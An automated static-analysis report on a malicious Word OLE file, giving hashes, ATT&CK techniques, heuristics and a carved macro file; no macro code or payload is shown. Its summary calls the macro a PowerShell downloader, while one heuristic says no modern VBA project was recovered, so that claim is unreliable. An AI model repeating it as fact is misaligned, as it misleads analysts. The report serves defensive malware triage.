Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dc9cf647244850e2…

Verdict: MALICIOUS

File type: Office (OLE)

  • Size: 118.8 KB
  • Created: 2018-05-24 08:43:00
  • Authoring application: Microsoft Office Word
  • First seen: 2020-09-04
  • MD5: 3192dc555fb7dfa16030ae88b7b7a76a
  • SHA-1: 24da5365da807a7b3e4c597e163e792108662780
  • SHA-256: dc9cf647244850e270086447fd97913cbf7c339ccbc10ff5d9b95289416614bd
  • Risk score: 82

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute a PowerShell command, which is obfuscated but appears to be a downloader for a second-stage payload. The presence of the AutoOpen marker and the large slack space are indicative of malicious intent.

Heuristics (4)

  • [high] OLE_SLACK_ANOMALY: OLE document has large unaccounted-for region
    OLE file is 121,600 bytes but its declared streams total only 36,188 bytes — 85,412 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • [medium] OLE_VBA_MACROS: VBA macros detected
    Document contains VBA macro code.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
  • Kind: vba-macro
  • Source: oletools.olevba.extract_macros (decoded VBA source)
  • Size: 14757 bytes
  • SHA-256: 539e284e86582e7cd360081b3ba977c0106f3b8cf9992aa7bee74bbc57e60f5c

Preview script: first 1,000 lines of the extracted script.